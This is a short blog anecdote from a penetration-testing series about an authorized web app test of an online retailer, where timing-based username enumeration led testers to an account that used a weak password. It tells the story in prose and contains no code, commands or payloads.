Each year, Rapid7 penetration testers complete hundreds of internally and externally based penetration testing service engagements. This post is part of an ongoing series featuring testimonials of what goes on beneath the hoodie. For more insights, check out our 2019 Under the Hoodie report.
One day, we were working on a web app penetration test for an online retailer client. While testing the login process with the client’s prior written consent, it looked like we were able to identify valid usernames through response times for failed logins.
To get a nice, thorough proof-of-concept, we took some common email domains and first and last names to create a decent-sized list of enumerated users. When doing user enumeration, it’s good advice to first focus on confirming all the users you can and only worry about guessing passwords after you know which users are valid. So, we started enumeration using a placeholder password: a short, simple word with no special characters, numbers, or capitalization.
At some point, the responses we got weren’t what we were expecting. So, we went back down through them and found that one login had actually been successful with the placeholder password! The client wasn’t really a fan of forcing users to choose complex passwords, but hopefully our accidental account compromise while demonstrating user enumeration was a good learning experience.
Interested in learning more about how Rapid7 pen testers conduct their assessments? Check back every week for a new story in the series.
- This One Time on a Pen Test: Paging Doctor Hackerman
- This One Time on a Pen Test: How I Compromised a Healthcare Portal Before My Hot Cocoa Went Cold
- This One Time on a Pen Test: Missed a Spot
- This One Time on a Pen Test: Nerds in the NERC
- This One Time on a Pen Test: The Pizza of Doom
- This One Time on a Pen Test: What’s in the Box?